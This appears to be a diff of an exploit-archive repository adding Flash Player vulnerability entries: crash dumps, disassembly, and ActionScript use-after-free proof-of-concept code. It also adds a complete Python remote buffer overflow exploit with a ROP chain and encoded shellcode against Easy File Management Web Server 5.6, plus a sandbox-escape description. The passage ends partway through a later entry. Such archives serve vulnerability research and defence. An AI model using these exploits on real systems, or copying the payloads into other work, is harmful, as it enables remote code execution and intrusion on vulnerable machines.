0139a657 8a0402 mov al,byte ptr [edx+eax] ds:002b:078ad9a4=??
0:000> !address eax
[...]
Usage: <unknown>
Base Address: 07560000
End Address: 078ad000
Region Size: 0034d000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 07560000
Allocation Protect: 00000001 PAGE_NOACCESS
0:000> db eax
078a53b7 c5 ea 85 00 00 b6 19 00-38 01 c5 3d 84 9e c2 3d ........8..=...=
078a53c7 2f 48 d5 a0 2b 00 73 65-63 6f 6e 64 00 00 00 03 /H..+.second....
078a53d7 00 00 00 01 00 00 00 01-00 00 00 00 02 00 00 00 ................
078a53e7 b7 01 00 00 88 39 00 0a-00 74 68 69 73 00 5f 78 .....9...this._x
078a53f7 00 78 6d 00 5f 79 00 79-6d 00 5f 72 6f 6f 74 00 .xm._y.ym._root.
078a5407 66 69 72 73 74 73 00 63-6c 61 75 73 00 68 70 00 firsts.claus.hp.
078a5417 72 65 6d 6f 76 65 4d 6f-76 69 65 43 6c 69 70 00 removeMovieClip.
078a5427 96 02 00 08 00 1c 96 04-00 08 01 08 00 1c 96 02 ................
Notes:
- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.
- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EDX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "EAX".
- The memory under "EAX" contains a section of the input file starting at offset 0x3453b7.
- The index (EDX) value originates from offset 0x3453b8 in the file (at 1 byte offset relative to the EAX memory region).
- Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37856.zip

49
platforms/windows/dos/37857.txt Executable file
View file

@ -0,0 +1,49 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=362&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following access violation was observed in the Adobe Flash Player plugin:
(1dec.1af0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FlashPlayer.exe -
eax=00006261 ebx=00001501 ecx=010ae1e4 edx=00006262 esi=0736dda0 edi=05a860d0
eip=0044ae55 esp=010ae170 ebp=010ae564 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297
FlashPlayer!WinMainSandboxed+0x57aee:
0044ae55 803c3000 cmp byte ptr [eax+esi],0 ds:002b:07374001=??
0:000> !address esi
[...]
Usage: <unknown>
Base Address: 06e60000
End Address: 07374000
Region Size: 00514000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 06e60000
Allocation Protect: 00000001 PAGE_NOACCESS
0:000> db esi
0736dda0 8e 56 fa 1b 00 13 e3 85-00 0c 54 72 65 62 75 63 .V........Trebuc
0736ddb0 68 65 74 20 4d 53 3e 00-7e 00 80 00 9f 00 21 01 het MS>.~.....!.
0736ddc0 4c 01 76 01 85 01 97 01-e9 01 02 02 40 02 9a 02 L.v.........@...
0736ddd0 c4 02 1d 03 49 03 d8 03-26 04 4f 04 b5 04 fd 04 ....I...&.O.....
0736dde0 1d 05 39 05 90 05 b1 05-e2 05 f6 05 22 06 40 06 ..9.........".@.
0736ddf0 97 06 da 06 2d 07 94 07-ac 07 d8 07 02 08 21 08 ....-.........!.
0736de00 3f 08 af 08 fb 08 40 09-92 09 e2 09 1c 0a c9 0a ?.....@.........
0736de10 00 0b 35 0b 5b 0b 77 0b-cd 0b 04 0c 52 0c 9d 0c ..5.[.w.....R...
Notes:
- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.
- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ESI".
- The memory under "ESI" contains a section of the input file starting at offset 0x50dda0.
- Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37857.zip

62
platforms/windows/dos/37858.txt Executable file
View file

@ -0,0 +1,62 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=363&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following access violation was observed in the Adobe Flash Player plugin:
(1ba8.1c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FlashPlayer.exe -
eax=0004c800 ebx=00000000 ecx=08982000 edx=00002588 esi=00001200 edi=0042d46c
eip=017723c0 esp=0042d278 ebp=0042d3c4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0:
017723c0 8b0408 mov eax,dword ptr [eax+ecx] ds:002b:089ce800=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0042d3c4 0177cfaf 0042d3e0 0042d46c 00000001 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0
0042d3ec 0177d112 0042d414 0042d46c 00001376 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x300df
0042d424 0177d4c2 0042d454 0042d46c 00000006 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x30242
0042d4e0 0176ec7a 00000000 0042d540 03497440 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x305f2
0042d544 01788715 08875020 47535542 6c61746e FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x21daa
0042d7d8 01775c95 0042d814 01775f31 01775f41 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x3b845
0042d7e0 01775f31 01775f41 03497440 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x28dc5
0042d828 017834d2 03497440 00000000 00000030 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x29061
00000000 00000000 00000000 00000000 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x36602
0:000> db ecx
08982000 35 00 00 00 01 00 00 00-00 00 00 00 00 00 00 ff 5...............
08982010 00 00 00 00 00 00 00 00-01 00 00 00 00 00 00 00 ................
08982020 80 a4 b7 01 00 00 00 00-00 00 00 00 00 10 00 00 ................
08982030 00 00 00 00 18 a8 b7 01-20 50 87 08 00 00 00 00 ........ P......
08982040 03 30 02 00 49 00 00 00-01 00 00 00 00 00 00 00 .0..I...........
08982050 00 00 00 ff 00 00 00 00-00 00 00 00 01 00 00 00 ................
08982060 00 00 00 00 80 a4 b7 01-00 00 00 00 00 00 00 00 ................
08982070 00 10 00 00 00 00 00 00-18 a8 b7 01 20 50 87 08 ............ P..
0:000> !address ecx
[...]
Usage: <unknown>
Base Address: 08906000
End Address: 08990000
Region Size: 0008a000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 087f0000
Allocation Protect: 00000001 PAGE_NOACCESS
Notes:
- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.
- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ECX".
- The 32-bit value read from the unmapped memory address is in fact a pointer, and is used to immediately read 12 bytes from in one function up the call chain.
- Attached samples: signal_sigsegv_7ffff710e9d3_881_11431348555663755408.ttf.swf (crashing file), 11431348555663755408.ttf.swf (original file).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37858.zip

51
platforms/windows/dos/37860.txt Executable file
View file

@ -0,0 +1,51 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.
VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1
REPRODUCTION CASE
The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004B82D0 push esi
.text:004B82D1 mov esi, [esp+4+arg_0]
.text:004B82D5 push edi
.text:004B82D6 mov edi, ecx
.text:004B82D8 mov ecx, [edi+94h] ; edi points to freed memory
.text:004B82DE and ecx, 0FFFFFFFEh
.text:004B82E1 add ecx, 3Ch
.text:004B82E4 mov eax, esi
.text:004B82E6 call sub_4B0724 ; crash below
...
.text:004B0724 mov edx, [ecx] ; crash here ecx = 3ch (null pointer)
.text:004B0726 cmp edx, [eax]
.text:004B0728 jnz short loc_4B077E
Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
tf.removeTextField()
return 0x41414142
}
var c = new Color(tf)
c.setRGB(o)
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37860.zip

74
platforms/windows/dos/37861.txt Executable file
View file

@ -0,0 +1,74 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=377&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=487237]
Credit is to bilou, working with the Chromium Vulnerability Reward Program
---
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property.
This is almost a repost of Issue 457680 due to a patch failure.
VERSION
Chrome Version: N/A now, Flash StandAlone Debug 17.0.0.188
Operating System: [Win7 x64 SP1]
REPRODUCTION CASE
The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_v2_as2.swf in a browsable directory and run the swf with Chrome. It might crash while dereferencing 0x41424344 (hopefully, not tested yet because not available).
After compiling mapBitmap_v2_as2.swf, I had to change the bytes at offset 0x92B in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)
The description is exactly the same as in Issue 457680 so I won't repost it. Here are just my comments on the patch.
They basically added a marker at offset +0xDC in the flash standalone debugger (the standalone player is not available at the time of writing):
.text:005AD629 loc_5AD629:
.text:005AD629 lea ecx, [esi+0DCh]
.text:005AD62F push edi
.text:005AD630 mov [ebp+1C4h+var_198], ecx
.text:005AD633 call xsetUseMarker
.text:0059F762 cmp byte ptr [ecx], 0 ; is the marker present?
.text:0059F765 jz short loc_59F77B
.text:0059F767 cmp [esp+arg_0], 0 ; is 0 provided?
.text:0059F76C jz short locret_59F77E
.text:0059F76E mov ecx, dword_EE4788 ; kill the program
.text:0059F774 call sub_9798C0
.text:0059F779 jmp short locret_59F77E
.text:0059F77B
.text:0059F77B loc_59F77B:
.text:0059F77B mov byte ptr [ecx], 1 ; else set the marker
.text:0059F77E
.text:0059F77E locret_59F77E:
.text:0059F77E retn 4
That marker is then removed when we exit the BitmapData dispatcher:
.text:005AEF29 mov eax, [ebp+1C4h+var_198] ; jumptable 005AD654 default case
.text:005AEF2C mov byte ptr [eax], 0
So, to trigger again the issue, we just have to put an extra call to getPixel32 for example:
var o = new Object()
o.valueOf = function () {
bd.getPixel32(1,4) // remove the marker :)
f()
for (var i = 0; i<0x10;i++) {
var tf:TextFormat = new TextFormat()
tf.tabStops = b
a[i] = tf
}
return 4
}
bd.getPixel32(o,4)
And we're done :)
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37861.zip

63
platforms/windows/dos/37862.txt Executable file
View file

@ -0,0 +1,63 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=378&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
We've hit the same bug from two different avenues:
1) A report to the Chromium bug tracker: https://code.google.com/p/chromium/issues/detail?id=485893
2) The new Flash fuzzing collaboration between Mateusz, Chris, Ben.
For 1), here are the details (there's also an attachment):
---
VULNERABILITY DETAILS
This is a OOB read vulnerability when processing the SCRIPTDATASTRING object in Flv file.
VERSION
Chrome Version: 42.0.2311.135
Operating System: Windows 7
REPRODUCTION CASE
See attached file
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash:
Tab
Crash State:
[WARNING:..\..\..\..\flash\platform\pepper\pep_module.cpp(63)] SANDBOXED
(e38.c34): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000006 ebx=003ff0b0 ecx=000ff000 edx=05110000 esi=00000000 edi=00000000
eip=63be351a esp=003ff06c ebp=003ff080 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\PepperFlash\pepflashplayer.dll -
pepflashplayer!PPP_ShutdownBroker+0x162327:
63be351a 0fb632 movzx esi,byte ptr [edx] ds:002b:05110000=??
4:064> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
003ff080 63be379e pepflashplayer!PPP_ShutdownBroker+0x162327
003ff0b4 63cfd02e pepflashplayer!PPP_ShutdownBroker+0x1625ab
003ff0ec 63b3c609 pepflashplayer!PPP_ShutdownBroker+0x27be3b
003ff13c 63cf6d58 pepflashplayer!PPP_ShutdownBroker+0xbb416
003ff14c 63cf6fbc pepflashplayer!PPP_ShutdownBroker+0x275b65
003ff35c 63d11691 pepflashplayer!PPP_ShutdownBroker+0x275dc9
003ff368 63d116d6 pepflashplayer!PPP_ShutdownBroker+0x29049e
003ff4b4 63d0d842 pepflashplayer!PPP_ShutdownBroker+0x2904e3
003ff4fc 63cf99a3 pepflashplayer!PPP_ShutdownBroker+0x28c64f
003ff550 63b94728 pepflashplayer!PPP_ShutdownBroker+0x2787b0
003ff574 63ff0933 pepflashplayer!PPP_ShutdownBroker+0x113535
00000000 00000000 pepflashplayer!PPP_ShutdownBroker+0x56f740
---
For 2), there's a .tar file with a repro SWF in it (may not reproduce outside of analysis tools because it is an OOB read).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37862.zip

27
platforms/windows/dos/37875.txt Executable file
View file

@ -0,0 +1,27 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=410&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following crash was observed in Flash Player 17.0.0.188 on Windows:
(81c.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37397006 ebx=00000000 ecx=008c0493 edx=09f390d0 esi=08c24d98 edi=09dc2000
eip=07a218cb esp=015eda80 ebp=015edb24 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050216
Flash32_17_0_0_188+0x18cb:
07a218cb ff6004 jmp dword ptr [eax+0x4] ds:0023:3739700a=????????
- The test case reproduces on Windows 7 using IE11. It does not appear to immediately reproduce on Windows+Chrome or Linux+Chrome.
- The crash can also reproduce on one of the two mov instructions prior to the jmp shown here.
- The crash appears to occur due to a use-after-free related to loading a sub-resource from a URL.
- The test case minimizes to an 11-bit difference from the original sample file.
- The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37875.zip

131
platforms/windows/dos/37883.txt Executable file
View file

@ -0,0 +1,131 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=498984]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
VERSION
Chrome Version: [43.0.2357.124, Flash 18.0.0.160]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Flash 17.0.0.169 added a flag to mitigate Issue 457278
.text:004D6F0B mov esi, [esp+2Ch+var_C]
.text:004D6F0F push 1 ; char
.text:004D6F11 mov ecx, edi ; int
.text:004D6F13 mov byte ptr [esi+0Ch], 1 ; this flag was added
.text:004D6F17 call xparseAS2Code
.text:004D6F1C mov byte ptr [esi+0Ch], 0
Flash 18.0.0.160 added an other flag to mitigate Issue 476926
.text:004D6E3E loc_4D6E3E:
.text:004D6E3E cmp byte ptr [ebp+0Ch], 0 ; this flag was added
.text:004D6E42 lea eax, [ebp+0Ch]
.text:004D6E45 mov [esp+2Ch+var_8], eax
.text:004D6E49 jz short loc_4D6E58
.text:004D6E4B mov ecx, dword_E50A40
.text:004D6E51 call sub_967730
.text:004D6E58
.text:004D6E58 loc_4D6E58:
.text:004D6E58 mov byte ptr [eax], 1
.text:004D6E5B jmp short loc_4D6E65
But they didn't figure it was possible to execute AS2 code a bit above in the function:
.text:004D6E6F mov eax, [ebp+0]
.text:004D6E72 push 0
.text:004D6E74 lea edx, [esp+34h+var_14]
.text:004D6E78 push edx
.text:004D6E79 mov edx, [eax+14h]
.text:004D6E7C mov ecx, ebp
.text:004D6E7E call edx ; return the filter name
.text:004D6E80 push eax
.text:004D6E81 lea eax, [esp+3Ch+var_10]
.text:004D6E85 push eax
.text:004D6E86 mov ecx, edi
.text:004D6E88 call xcreateStringObject
.text:004D6E8D mov ebx, [esp+38h+arg_4]
.text:004D6E91 push eax
.text:004D6E92 push ecx
.text:004D6E93 mov eax, esp
.text:004D6E95 mov ecx, edi
.text:004D6E97 mov [eax], ebx
.text:004D6E99 call sub_420400 ; execute some AS2 with a custom __proto__ object
For ex:
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124.
That should crash while dereferencing 0x41424344.
Compile with Flash CS 5.5.
***************************************************************************
Content of FiltusPafusTer.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
for (var i = 0; i<0x20;i++) {
_global.a1[0x100+i*4].tabStops = [1,2,3,4]
}
_global.tfield.filters = []
for (var i = 0; i<0x200;i++) {
_global.a1[i].tabStops = a2
}
}
_global.tfield = tfield
_global.a1 = a1
_global.a2 = a2
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
var a = tfield.filters
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37883.zip

115
platforms/windows/dos/37884.txt Executable file
View file

@ -0,0 +1,115 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]
VULNERABILITY DETAILS
Copy Paste of Issue 480496
VERSION
Chrome Version: N/A yet, Flash 18.0.0.203
Operating System: [Win7 x64 SP1]
REPRODUCTION CASE
Flash 18.0.0.203 patched Issue 480496 by checking if the internal filter object is still alive after the first Array.length call (from Flash player standalone):
.text:004D71DA loc_4D71DA:
.text:004D71DA and ecx, 0FFFFFFF8h
.text:004D71DD call xAS2_getArrayLength
.text:004D71E2 test eax, eax
.text:004D71E4 jle short loc_4D725D
.text:004D71E6 mov ecx, [esp+8+arg_C]
.text:004D71EA mov eax, [ecx+94h]
.text:004D71F0 test eax, 0FFFFFFFEh
.text:004D71F5 jz short loc_4D7200
.text:004D71F7 and eax, 0FFFFFFFEh
.text:004D71FA cmp dword ptr [eax+28h], 0 ; here we check whether the object has been deleted or not
.text:004D71FE jnz short loc_4D720B
.text:004D7200
.text:004D7200 loc_4D7200:
.text:004D7200 mov ecx, dword_E51A40
.text:004D7206 call sub_968A00 ; and in that case we suicide
Unfortunately they forget to do that check after the second Array.length call:
.text:004D721D loc_4D721D:
.text:004D721D and eax, 0FFFFFFF8h
.text:004D7220 push edi
.text:004D7221 mov edi, eax
.text:004D7223 mov ecx, edi
.text:004D7225 xor esi, esi
.text:004D7227 call xAS2_getArrayLength ; here we can still execute a script and delete the filters...
.text:004D722C test eax, eax
.text:004D722E jle short loc_4D725C
Should crash that way:
CPU Disasm
Address Hex dump Command Comments
004CE27F 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE282 8942 04 MOV DWORD PTR DS:[EDX+4],EAX ; write a pointer to 0x41424344
004CE285 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE288 8950 08 MOV DWORD PTR DS:[EAX+8],EDX
004CE28B FF41 08 INC DWORD PTR DS:[ECX+8]
004CE28E 8941 04 MOV DWORD PTR DS:[ECX+4],EAX
004CE291 C2 0400 RETN 4
004CE294 FF41 08 INC DWORD PTR DS:[ECX+8]
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41424344
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
a1[i].tabStops = a2
}
a1[0xFF].tabStops = []
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
a1[0xFE].tabStops = []
a1[0xFD].tabStops = []
for (var i = 0x100; i<0x200;i++) {
_global.a1[i].tabStops = _global.a2
}
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 4) f()
return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o;
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37884.zip

93
platforms/windows/remote/37808.py Executable file
View file

@ -0,0 +1,93 @@
#!/usr/bin/python
# Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow
# Version: 5.6
# Date: 2015-08-17
# Author: Tracy Turben (tracyturben@gmail.com)
# Software Link: http://www.efssoft.com/
# Tested on: Win7x32-EN
# Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;)
# Credits for vulnerability discovery:
# superkojiman (http://www.exploit-db.com/exploits/33453/)
from struct import pack
import socket,sys
import os
host="192.168.1.15"
port=80
junk0 = "\x90" * 80
# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll]
# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
call_edx=pack('<L',0x1001D8C8)
junk1="\x90" * 280
ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll]
# Since 0x00 would break the exploit needs to be crafted on the stack
crafted_jmp_esp=pack('<L',0xA44162FB)
test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction
kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
kungfu+=pack('<L',0xDEADBEEF) # filler
kungfu+=pack('<L',0xDEADBEEF) # filler
kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP
kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll]
nopsled="\x90" * 20
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode
buf="GET /vfolder.ghp HTTP/1.1\r\n"
buf+="User-Agent: Mozilla/4.0\r\n"
buf+="Host:" + host + ":" + str(port) + "\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf+="Accept-Language: en-us\r\n"
buf+="Accept-Encoding: gzip, deflate\r\n"
buf+="Referer: http://" + host + "/\r\n"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf+="Conection: Keep-Alive\r\n\r\n"
print "[*] Connecting to Host " + host + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((host, port))
print "[*] Connected to " + host + "!"
except:
print "[!] " + host + " didn't respond\n"
sys.exit(0)
print "[*] Sending malformed request..."
s.send(buf)
print "[!] Exploit has been sent!\n"
s.close()

17
platforms/windows/remote/37840.txt Executable file
View file

@ -0,0 +1,17 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
FlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape
1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker
FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.
There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers "\" as delimiter. If the destination includes "/", FlashBroker will use a wrong destination folder for check.
The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.
2. Credit
Jietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip

18
platforms/windows/remote/37841.txt Executable file
View file

@ -0,0 +1,18 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
FlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape
1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker
